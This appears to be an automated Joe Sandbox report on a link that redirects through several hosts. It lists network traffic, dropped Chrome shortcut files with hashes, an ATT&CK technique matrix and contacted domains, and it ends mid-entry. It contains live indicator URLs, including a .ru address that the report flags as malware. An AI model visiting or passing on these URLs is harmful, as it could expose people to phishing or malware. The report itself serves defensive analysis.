Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:19:50 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: t66Dr/jcIfZKwZc90O1nYnfuxz6gSu+2a5o=$C+SIMaNBvnxg524/Server: cloudflareCF-RAY: 8f061ca9ebabf799-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:19:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 4XF8oxgxo3MGlSAzdwkAeXo6g0k6r6JiUyE=$0WS9pAgEn2vwZM7pcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f061cd4981c0f51-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:20:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 4pl4Hf5/DSx/Iuqli5NreK5HADz+QG50Gi8=$znctilPZ0Hci7UqFcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f061cf55e238c05-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_149.1.dr, chromecache_138.1.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_139.1.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_139.1.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_139.1.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_139.1.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_139.1.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_139.1.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_139.1.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_139.1.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_139.1.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_139.1.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: chromecache_139.1.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_139.1.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_139.1.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal48.win@21/51@42/15
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1956,i,15815528503565354663,14100251185342758663,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1956,i,15815528503565354663,14100251185342758663,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz090%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://zurl.co/uPUU0%Avira URL Cloudsafe
https://fht.lidociou.com/favicon.ico0%Avira URL Cloudsafe
https://ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru/GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRI100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru
104.21.32.251
truefalse
    high
    dual-spov-0006.spov-msedge.net
    13.107.137.11
    truefalse
      high
      zurl.co
      136.143.187.52
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.2.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                app.signitic.com
                15.236.57.51
                truefalse
                  unknown
                  fht.lidociou.com
                  104.21.86.90
                  truefalse
                    unknown
                    www.google.com
                    142.250.181.68
                    truefalse
                      high
                      www.onedrive.com
                      unknown
                      unknownfalse
                        high
                        assets.onestore.ms
                        unknown
                        unknownfalse
                          high
                          ajax.aspnetcdn.com
                          unknown
                          unknownfalse
                            high
                            c.s-microsoft.com
                            unknown
                            unknownfalse
                              high
                              onedrive.live.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/false
                                  high
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    high
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      high
                                      https://fht.lidociou.com/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.jsfalse
                                        high
                                        https://onedrive.live.com/false
                                          high
                                          https://a.nel.cloudflare.com/report/v4?s=YlRGWgh5SJgyPrXvPyL5W5WFYijsbRb75o23PDkVIOGv4OecdJjYCSMjIG218qWuZoCWxkpFlQKHGB13%2BHcDfdQyxNmWnqb%2B3p2R7q5354dGIJLmDyOX0HSDn5Hfow%3D%3Dfalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f061c7f6a0e43aa&lang=autofalse
                                              high
                                              https://zurl.co/uPUUfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f061c7f6a0e43aa/1733926788305/RiSF0WxLge_mIxDfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                  high
                                                  https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09false
                                                    unknown
                                                    https://ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru/GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRIfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://fht.lidociou.com/lrjqM/false
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8f061c7f6a0e43aa/1733926788306/994b8034e574a2411887595169e207500de62f8c2bd74fbc747241d30a2e7af9/V_4VoVIq-fp0XsLfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://outlook.live.com/owa/chromecache_139.1.drfalse
                                                          high
                                                          https://www.skype.com/en/chromecache_139.1.drfalse
                                                            high
                                                            https://products.office.com/en-us/homechromecache_139.1.drfalse
                                                              high
                                                              https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_139.1.drfalse
                                                                high
                                                                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_139.1.drfalse
                                                                  high
                                                                  https://onedrive.live.com/about/en-us/chromecache_139.1.drfalse
                                                                    high
                                                                    https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_139.1.drfalse
                                                                      high
                                                                      https://www.onenote.com/chromecache_139.1.drfalse
                                                                        high
                                                                        https://www.xbox.com/chromecache_139.1.drfalse
                                                                          high
                                                                          http://schema.org/Organizationchromecache_139.1.drfalse
                                                                            high
                                                                            http://github.com/requirejs/almond/LICENSEchromecache_149.1.dr, chromecache_138.1.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.18.94.41
                                                                              challenges.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              172.67.139.11
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              142.250.181.68
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              35.190.80.1
                                                                              a.nel.cloudflare.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              15.236.57.51
                                                                              app.signitic.comUnited States
                                                                              16509AMAZON-02USfalse
                                                                              104.21.86.90
                                                                              fht.lidociou.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              13.107.137.11
                                                                              dual-spov-0006.spov-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              104.21.32.251
                                                                              ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ruUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              136.143.187.52
                                                                              zurl.coUnited States
                                                                              2639ZOHO-ASUSfalse
                                                                              104.18.95.41
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              151.101.2.137
                                                                              code.jquery.comUnited States
                                                                              54113FASTLYUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              104.17.25.14
                                                                              cdnjs.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.16
                                                                              192.168.2.7
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1573138
                                                                              Start date and time:2024-12-11 15:18:57 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 2m 37s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                              Sample URL:https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:13
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal48.win@21/51@42/15
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.162.84, 199.232.210.172, 172.217.17.46, 142.250.181.142, 51.105.104.217, 23.218.209.163, 152.199.19.160, 2.16.164.122, 2.16.164.33, 104.102.41.166, 2.16.164.113, 2.16.164.83, 172.217.17.35, 23.218.208.109, 20.12.23.50
                                                                              • Excluded domains from analysis (whitelisted): odwebp.trafficmanager.net, odc-web-brs.onedrive.akadns.net, assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, a1449.dscg2.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, redirector.gvt1.com, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, cosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.net, a1778.g2.akamai.net, e10583.dspg.akamaiedge.net, fs.microsoft.com, accounts.google.com, odc-web-geo.onedrive.akadns.net, cs22.wpc.v0cdn.net, ctldl.windowsupdate.com, statics-marketingsites-wcus-ms-com.akamaized.net, assets.onestore.ms.akadns.net, fe3cr.delivery.mp.microsoft.com, c-s.cms.ms.akadns.net, c.s-microsoft.com-c.edgekey.net, e13678.dscg.akamaiedge.net, clients.l.google.com, az725175.vo.msecnd.net, www.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09
                                                                              No simulations
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 13:19:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2673
                                                                              Entropy (8bit):3.9755704940560457
                                                                              Encrypted:false
                                                                              SSDEEP:48:8FYdfTXnaHuidAKZdA1FehwiZUklqehZy+3:8FMDbOy
                                                                              MD5:4BE80424D711E2F7B70F3B176AF9F9D2
                                                                              SHA1:EBBF625B72896F066DDECC8CDF954D2A650B8062
                                                                              SHA-256:4C12963D7F3F1BA5D6A8CFD32C86570E73E949761B4D6B444E05F11405FC21FD
                                                                              SHA-512:3E52B4F8719DBC20AC51E3A63914893354639B35D15B40500C843C573BB69D7B40A9968A2AF0A83E951A90FB1124D7FF65EB09CBC51878F083BD1108A80E1E3C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,....S....K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yfr....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ynr....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ynr....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ynr..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yor...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............na......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 13:19:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2675
                                                                              Entropy (8bit):3.9939529816604527
                                                                              Encrypted:false
                                                                              SSDEEP:48:8gdfTXnaHuidAKZdA1seh/iZUkAQkqeh+y+2:8UDF9Q3y
                                                                              MD5:09539B64C3BACD49C7361914C95FF2FE
                                                                              SHA1:A0A1CAD8969A87A0AF9F5EA72E5BC6A7FA4E95B1
                                                                              SHA-256:C5A98E353EEDCA3D490B2D2624946DB60921AA93F75C155853F6C00ABC155A5A
                                                                              SHA-512:C693DD7616CECB5156F45199E0BFA6570CB52A978F29367384B3ACC854B146E7852EC06F37E44A42446F614366F84CA9F3F34B2EC0E9B0917E3AB33924B55048
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,........K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yfr....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ynr....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ynr....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ynr..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yor...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............na......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
